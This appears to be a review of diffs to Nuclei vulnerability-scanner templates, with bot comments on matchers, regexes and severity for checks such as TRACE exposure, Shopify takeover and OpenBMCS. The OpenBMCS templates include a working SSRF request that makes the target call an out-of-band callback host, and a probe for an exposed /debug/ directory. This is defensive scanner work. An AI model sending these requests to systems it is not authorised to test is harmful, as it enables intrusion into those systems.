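Review bot: `len(body) <= 1024` will reject legitimate files: RFC 9116 recommends a cleartext PGP signature, and a signed security.txt with a handful of `Contact:`, `Expires:`, `Encryption:` and `Policy:` lines is routinely over 1 KB, so this dsl matcher turns real deployments into misses. Raise the cap substantially or drop it and rely on the 200 status plus the `Contact:` match. Two smaller points: `condition: and` on a one-element `words:` or `dsl:` list is a no-op, and `(?mi)Contact:(.*)` captures a trailing `\r` on CRLF files, so `(?mi)Contact:\s*(\S.*?)\s*$` would give cleaner output. Switching to `{{RootURL}}` is correct, since `.well-known` is defined relative to the site root.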
@ -1,25 +0,0 @@
id: tabnabbing-check

info:
name: Reverse Tabnabbing
author: bolli95
severity: info
tags: misc
reference:
- https://owasp.org/www-community/attacks/Reverse_Tabnabbing
- https://www.youtube.com/watch?v=TMKZCHYmtD4
- https://hackerone.com/reports/211065

requests:
- method: GET
path:
- "{{BaseURL}}"

matchers-condition: and
matchers:
- type: dsl
dsl:
- 'regex("<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", replace_regex(replace_regex(body, "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", ""), "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", "")) || regex("window\.open\\([^,]+\\)", body)'
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'referrer-policy: no-referrer')"
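Review bot: dropping this template is justified (current Chrome, Firefox and Safari already imply `noopener` for `target="_blank"`, and the nested `replace_regex` dsl was costly to run against every response body), but the removal leaves no replacement and the commit does not say why; record the rationale so `tabnabbing-check` is not re-submitted, and if the referrer signal is still wanted, the cheap second matcher, `!contains(tolower(all_headers), 'referrer-policy: no-referrer')`, can live on as a header-hygiene check in its own template.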
@ -15,9 +15,9 @@ requests:
matchers:
- type: word
name: trace-request
part: body
words:
- "TRACE / HTTP"
part: body

- method: OPTIONS
path:
@ -26,6 +26,6 @@ requests:
matchers:
- type: regex
name: options-request
part: header
regex:
- "(?i)Allow: [A-Z,]*TRACE"
part: header
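Review bot: unrelated to the `part:` reorder but worth fixing while here: `(?i)Allow: [A-Z,]*TRACE` has no space in its character class, so a header written as `Allow: GET, POST, OPTIONS, TRACE` (space after each comma, which IIS and several other servers emit) never matches and the TRACE exposure is missed; `(?i)Allow:.*\bTRACE\b` or `[A-Z, ]*` covers both spellings.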
@ -4,7 +4,7 @@ info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK,thomas_from_offensity
severity: medium
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session.
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user's session.
reference:
- https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/
- https://github.com/javamelody/javamelody/wiki/UserGuide#16-security
@ -0,0 +1,28 @@
id: openbmcs-secret-disclosure

info:
name: OpenBMCS 2.4 Secrets Disclosure
author: dhiyaneshDK
severity: high
description: The application allows directory listing and information disclosure of some sensitive files that can allow an attacker to leverage the disclosed information and gain full BMS access
reference: https://www.exploit-db.com/exploits/50671
tags: openbmcs,misconfig
metadata:
shodan-query: http.favicon.hash:1550906681

requests:
- method: GET
path:
- "{{BaseURL}}/debug/"

matchers-condition: and
matchers:
- type: word
words:
- "change_password_sqls"
- "Index of /debug"
condition: and

- type: status
status:
- 200
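Review bot: the two words under `condition: and` only confirm that `/debug/` is listable and that the listing mentions `change_password_sqls`; they do not confirm that the listed files are readable, while `severity: high` and the description's "gain full BMS access" assume they are. A second request that fetches one of the files shown in the listing and matches on its contents would make the severity defensible; as written, a listing whose files all return 403 is still reported as high.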
@ -0,0 +1,31 @@
id: openbmcs-ssrf

info:
name: OpenBMCS 2.4 Unauthenticated SSRF / RFI
author: dhiyaneshDK
severity: high
description: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include (RFI) vulnerability exists in OpenBMCS within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application, allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display
reference: https://www.exploit-db.com/exploits/50670
tags: ssrf,oast,openbmcs
metadata:
shodan-query: http.favicon.hash:1550906681

requests:
- raw:
- |
POST /php/query.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

ip={{interactsh-url}}:80&argu=/

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"

- type: status
status:
- 302
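Review bot: the comment on `part: interactsh_protocol` says `# Confirms the DNS Interaction` but the word list is `- "http"`, so the matcher actually requires a completed HTTP callback; either match `dns` (which also fires when egress HTTP is blocked but name resolution works) or correct the comment. `matchers-condition: and` additionally ties the result to `status: 302`, so a target that makes the callback but answers 200 is an OAST hit that gets silently dropped; if the 302 is incidental rather than part of the vulnerable behaviour, remove that matcher. The `description` is also one run-on sentence and would read better split into the SSRF/RFI behaviour and its impact.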
@ -4,7 +4,7 @@ info:
name: Prometheus targets API endpoint
author: geeknik
severity: info
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge.
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer's knowledge.
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
tags: prometheus

@ -4,7 +4,7 @@ info:
name: Detect Springboot Thread Dump page
author: philippedelteil
severity: low
description: The threaddump endpoint provides a thread dump from the application’s JVM.
description: The threaddump endpoint provides a thread dump from the application's JVM.
reference: https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump
tags: springboot

@ -15,6 +15,6 @@ requests:
matchers:
- type: word
words:
- '<h1 class="headline">Uh oh. That page doesn\’t exist.</h1>'
- 'This page is reserved for artistic dogs.'
- '<h1 class="headline">Uh oh. That page doesn’t exist.</h1>'
condition: and
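Review bot: correct fix: inside a YAML single-quoted scalar a backslash is literal, so the old `doesn\’t` could never have matched the page. The new string still depends on the server sending the curly apostrophe as raw UTF-8 `’` rather than `&rsquo;` or `&#8217;`; if that varies, matching `That page doesn` and `t exist.</h1>` as two words under the existing `condition: and` is robust to either encoding.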
@ -2,7 +2,7 @@ id: shopify-takeover

info:
name: shopify takeover detection
author: pdteam
author: pdteam,philippedelteil
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -26,4 +26,6 @@ requests:

- type: dsl
dsl:
- '!contains(host,"myshopify.com")'
- '!contains(host,"myshopify.com")'
- '!contains(host,"shopify.com")'
condition: and
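Review bot: `!contains(host,"shopify.com")` already implies `!contains(host,"myshopify.com")`, because every host string containing `myshopify.com` also contains `shopify.com`, so the first dsl line is now dead weight and can be dropped; the `condition: and` is still needed, since a matcher's default across list entries is `or`.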